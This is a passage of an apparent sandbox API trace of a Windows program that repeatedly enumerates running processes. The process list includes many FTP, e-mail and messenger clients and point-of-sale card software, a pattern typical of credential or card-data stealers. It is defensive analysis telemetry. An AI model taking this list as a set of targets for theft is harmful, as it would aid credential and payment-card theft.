dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.797] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0145.799] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0145.800] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0145.802] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0145.804] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.806] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0145.807] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0145.809] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0145.810] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0145.812] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0145.813] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0145.816] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0145.817] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0145.819] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0145.821] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0145.822] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0145.827] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0145.830] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0145.832] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0145.833] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0145.835] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0145.837] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0145.839] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0145.841] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0145.843] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0145.845] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0145.846] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0145.848] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0145.850] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0145.852] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0145.854] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0145.862] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0145.864] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0145.866] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0145.868] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0145.875] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0145.877] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0145.878] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0145.880] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0145.883] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0145.885] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0145.887] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0145.889] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0145.891] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0145.893] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0145.895] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0145.897] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0145.899] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0145.901] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0145.903] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0145.905] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0145.915] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0145.918] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0145.923] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0145.926] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0145.928] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0145.930] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0145.931] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0145.934] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0145.935] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0145.937] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0145.939] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0145.941] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0145.942] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0145.944] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0145.946] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0145.948] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0145.950] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0145.952] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0145.954] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0145.955] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0145.957] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0145.963] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0145.965] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0145.967] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0145.969] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0145.971] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0145.972] Process32Next (in: hSnapshot=0x1fa8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0145.974] CloseHandle (hObject=0x1fa8) returned 1 [0145.974] Sleep (dwMilliseconds=0x64) [0146.089] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x14c8 [0146.105] Process32First (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.108] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0146.110] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0146.112] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.115] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0146.117] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: 